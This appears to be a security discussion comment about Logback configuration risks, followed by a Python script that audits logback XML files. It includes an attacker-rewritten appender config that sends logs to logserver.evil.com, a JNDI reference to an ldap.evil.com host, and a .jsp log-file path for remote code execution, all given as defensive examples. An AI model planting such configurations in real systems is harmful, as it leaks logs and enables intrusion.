<configuration>
  <appender name="SOCKET" class="ch.qos.logback.classic.net.SocketAppender">
    <remoteHost>logserver.evil.com</remoteHost>
    <port>9999</port>
    <includeCallerData>true</includeCallerData>
  </appender>
  <root level="DEBUG">
    <appender-ref ref="SOCKET" />
  </root>
</configuration>
If the configuration file is changed as above by the attacker, the log and stack trace information will be leaked. SocketAppender cannot make remoteHost localhost only, can it? Using logserver.evil.com is not a Logback vulnerability. Is using ldap://ldap.evil.com/xx a Logback vulnerability? I don't think so. Neither would be a Logback vulnerability. Moreover, appenders that use the network are not the only ones at risk. Even with FileAppender, RCE is possible if the output destination of the log file is in the web application and the extension of the file is jsp. (Like when CVE-2014-0094 (classloader manipulation) was used for RCE.) Of course, this is not a Logback vulnerability either. I think as follows.
- The event caused by rewriting the configuration file is not a Logback vulnerability, but a vulnerability of the component that allowed the configuration file to be rewritten.
- It is dangerous to use JNDI to configure access to untrusted sites. (e.g. JNDI name = ldap://ldap.untrusted.com/xx.)
- This is because we don't know when the behavior will change.
- This is an application vulnerability. (It would be nice if the documentation stated that you need to be careful.)
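The three risky configuration patterns named in the comment above (a network appender pointed at a non-local host, a FileAppender writing a `.jsp` inside the web application, and a JNDI reference to an untrusted remote naming service) can all be caught by auditing the logback configuration before it is loaded. The following is an added example written for this page, not code from the comment author or from the Logback project. The sample configuration is constructed from the comment's own scenarios, the `/srv/webapps/` deployment root is an assumed value, and `insertFromJNDI` is Logback's real configuration element for JNDI lookups.

```python
import ipaddress
import xml.etree.ElementTree as ET
from pathlib import PurePosixPath

# Constructed sample: the attacker-rewritten configuration from the comment, plus a
# FileAppender writing a .jsp under an assumed webapp root and a JNDI lookup to an
# untrusted LDAP server. None of this comes from a real deployment.
SAMPLE_CONFIG = """<configuration>
  <appender name="SOCKET" class="ch.qos.logback.classic.net.SocketAppender">
    <remoteHost>logserver.evil.com</remoteHost>
    <port>9999</port>
    <includeCallerData>true</includeCallerData>
  </appender>
  <appender name="FILE" class="ch.qos.logback.core.FileAppender">
    <file>/srv/webapps/ROOT/logs/app.jsp</file>
    <encoder><pattern>%msg%n</pattern></encoder>
  </appender>
  <insertFromJNDI env-entry-name="ldap://ldap.untrusted.com/xx" as="appName"/>
  <root level="DEBUG">
    <appender-ref ref="SOCKET"/>
    <appender-ref ref="FILE"/>
  </root>
</configuration>
"""

# Constructed "good" configuration: socket appender to loopback, file outside the webapp.
CLEAN_CONFIG = """<configuration>
  <appender name="SOCKET" class="ch.qos.logback.classic.net.SocketAppender">
    <remoteHost>127.0.0.1</remoteHost>
    <port>4560</port>
  </appender>
  <appender name="FILE" class="ch.qos.logback.core.FileAppender">
    <file>/var/log/myapp/app.log</file>
    <encoder><pattern>%msg%n</pattern></encoder>
  </appender>
  <root level="INFO">
    <appender-ref ref="SOCKET"/>
    <appender-ref ref="FILE"/>
  </root>
</configuration>
"""

WEBAPP_ROOTS = ("/srv/webapps/",)          # assumed; set to your servlet container's deploy dir
SCRIPT_SUFFIXES = {".jsp", ".jspx"}         # suffixes the container would execute
REMOTE_JNDI_SCHEMES = ("ldap://", "ldaps://", "rmi://", "dns://")


def is_local_host(host: str) -> bool:
    """True for 'localhost' or a loopback IP; anything else counts as remote."""
    host = host.strip().lower()
    if host in {"localhost", "localhost.localdomain"}:
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return False


def audit_logback_config(xml_text: str) -> list[str]:
    """Return a list of human-readable findings for a logback XML configuration."""
    findings: list[str] = []
    root = ET.fromstring(xml_text)

    for app in root.iter("appender"):
        name = app.get("name", "?")
        # Network appenders (Socket, SSLSocket, Syslog, ...) name their target host here.
        host = app.findtext("remoteHost") or app.findtext("syslogHost")
        if host is not None and not is_local_host(host):
            findings.append(f"{name}: log events are sent to non-local host {host.strip()!r}")

        # File-backed appenders: a script suffix under the webapp root is executable content.
        file_path = app.findtext("file")
        if file_path:
            file_path = file_path.strip()
            suffix = PurePosixPath(file_path).suffix.lower()
            if suffix in SCRIPT_SUFFIXES and file_path.startswith(WEBAPP_ROOTS):
                findings.append(f"{name}: log file {file_path!r} is an executable script inside the webapp")

    # Any element text or attribute that is a remote JNDI/naming URL.
    for el in root.iter():
        for value in [el.text or "", *el.attrib.values()]:
            if value.strip().lower().startswith(REMOTE_JNDI_SCHEMES):
                findings.append(f"<{el.tag}>: remote naming reference {value.strip()!r}")

    return findings


if __name__ == "__main__":
    for label, cfg in (("sample", SAMPLE_CONFIG), ("clean", CLEAN_CONFIG)):
        print(f"[{label}]")
        for finding in audit_logback_config(cfg) or ["no findings"]:
            print("  -", finding)
```

Run this against the configuration file at deploy time (or as a file-integrity check on the running instance); a non-empty result means the file differs from what the application owner intended, which is exactly the "configuration file was rewritten" case the comment attributes to the surrounding component rather than to Logback.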